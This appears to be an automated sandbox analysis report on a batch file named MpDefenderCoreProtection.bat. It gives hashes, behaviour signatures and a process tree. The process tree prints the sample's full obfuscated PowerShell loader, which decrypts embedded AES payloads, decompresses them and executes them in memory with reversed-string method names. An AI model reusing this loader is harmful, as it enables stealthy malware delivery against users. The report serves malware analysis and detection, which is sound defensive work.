Analysis
-
max time kernel
15s -
max time network
17s -
platform
windows7_x64 -
resource
win7-20241010-en -
resource tags
arch:x64arch:x86image:win7-20241010-enlocale:en-usos:windows7-x64system -
submitted
20-11-2024 20:38
Static task
static1
Behavioral task
behavioral1
Sample
MpDefenderCoreProtection.bat
Resource
win7-20241010-en
windows7-x64
4 signatures
300 seconds
General
-
Target
MpDefenderCoreProtection.bat
-
Size
3.8MB
-
MD5
8e550a5c4dfd929f9569d55f70eae366
-
SHA1
4d594deeeb29fd8501e0f81a351efe4b9220b939
-
SHA256
8283f48cec6ebef1bdd41cfd9769f11db127ff431a71002b25112bb79b0b0122
-
SHA512
d00a931f7c388589a0f267737c47a7fb348cb2eb457daf15d582b533301513a3eda0e190eb23fe7aa19fd81714d5f90a537e2382b574cbd87bdc964823bab92d
-
SSDEEP
49152:yir7trkN31WUqslOGw9m1YmK2CalCFp0+UR:yP
Score
1/10
Malware Config
Signatures
-
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 2728 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 2728 powershell.exe -
Suspicious use of WriteProcessMemory 12 IoCs
description pid Process procid_target PID 2252 wrote to memory of 2880 2252 cmd.exe 32 PID 2252 wrote to memory of 2880 2252 cmd.exe 32 PID 2252 wrote to memory of 2880 2252 cmd.exe 32 PID 2880 wrote to memory of 2884 2880 net.exe 33 PID 2880 wrote to memory of 2884 2880 net.exe 33 PID 2880 wrote to memory of 2884 2880 net.exe 33 PID 2252 wrote to memory of 2752 2252 cmd.exe 34 PID 2252 wrote to memory of 2752 2252 cmd.exe 34 PID 2252 wrote to memory of 2752 2252 cmd.exe 34 PID 2252 wrote to memory of 2728 2252 cmd.exe 35 PID 2252 wrote to memory of 2728 2252 cmd.exe 35 PID 2252 wrote to memory of 2728 2252 cmd.exe 35
Processes
-
C:\Windows\system32\cmd.execmd /c "C:\Users\Admin\AppData\Local\Temp\MpDefenderCoreProtection.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:2252 -
C:\Windows\system32\net.exenet file2⤵
- Suspicious use of WriteProcessMemory
PID:2880 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 file3⤵PID:2884
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('/hTAPReKWMaGUPsxvh8SiiR41fumgY/9sRHXfHkctYs='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('6MgLmE5FNbYAX6X+qh2cDQ=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $isHBU=New-Object System.IO.MemoryStream(,$param_var); $ypwny=New-Object System.IO.MemoryStream; $uyyTu=New-Object System.IO.Compression.GZipStream($isHBU, [IO.Compression.CompressionMode]::Decompress); $uyyTu.CopyTo($ypwny); $uyyTu.Dispose(); $isHBU.Dispose(); $ypwny.Dispose(); $ypwny.ToArray();}function execute_function($param_var,$param2_var){ $eMguq=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $kekMw=$eMguq.EntryPoint; $kekMw.Invoke($null, $param2_var);}$sSYKO = 'C:\Users\Admin\AppData\Local\Temp\MpDefenderCoreProtection.bat';$host.UI.RawUI.WindowTitle = $sSYKO;$McaeJ=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($sSYKO).Split([Environment]::NewLine);foreach ($NljuN in $McaeJ) { if ($NljuN.StartsWith('ktRBTENuIsvsRLWHoTWR')) { $MZjQx=$NljuN.Substring(20); break; }}$payloads_var=[string[]]$MZjQx.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "2⤵PID:2752
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2728
-